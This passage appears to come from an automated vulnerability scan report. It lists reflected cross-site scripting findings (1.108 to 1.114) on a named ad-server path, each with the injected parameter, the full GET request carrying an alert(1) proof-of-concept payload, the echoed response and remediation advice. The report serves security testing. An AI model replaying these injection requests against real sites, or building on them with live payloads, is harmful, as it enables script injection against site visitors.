User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5741
Date: Tue, 28 Jun 2011 03:07:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341f2df8"-alert(1)-"1d6528d0a37&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_fol.html%3F__source%3Domd_fol_Outer_xplusone");
var wmode = "opaque";
var bg = "same
...[SNIP]...

1.108. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dab"-alert(1)-"15ea4c0569c was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=9795614dab"-alert(1)-"15ea4c0569c&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:06:11 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
1001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=9795614dab"-alert(1)-"15ea4c0569c&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone");
va
...[SNIP]...

1.109. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd794"-alert(1)-"41d93ebe777 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288dd794"-alert(1)-"41d93ebe777&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5668
Date: Tue, 28 Jun 2011 03:06:38 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288dd794"-alert(1)-"41d93ebe777&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone");
var wmode = "op
...[SNIP]...

1.110. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a54e"-alert(1)-"f7737f749a5 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=156493a54e"-alert(1)-"f7737f749a5&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5725
Date: Tue, 28 Jun 2011 03:05:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=156493a54e"-alert(1)-"f7737f749a5&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Out
...[SNIP]...

1.111. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8672a"-alert(1)-"4eda465726c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=979568672a"-alert(1)-"4eda465726c&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5735
Date: Tue, 28 Jun 2011 03:08:40 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
71/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=979568672a"-alert(1)-"4eda465726c&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptac
...[SNIP]...

1.112. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7281a"-alert(1)-"90e990131bf was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=179410017281a"-alert(1)-"90e990131bf&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:09:05 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=179410017281a"-alert(1)-"90e990131bf&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var
...[SNIP]...

1.113. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c87"-alert(1)-"ae535e6c623 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683c2c87"-alert(1)-"ae535e6c623&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5739
Date: Tue, 28 Jun 2011 03:07:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683c2c87"-alert(1)-"ae535e6c623&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone");
var wmode = "opaq
...[SNIP]...

1.114. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43b35"-alert(1)-"26719022c54 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=43b35"-alert(1)-"26719022c54 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
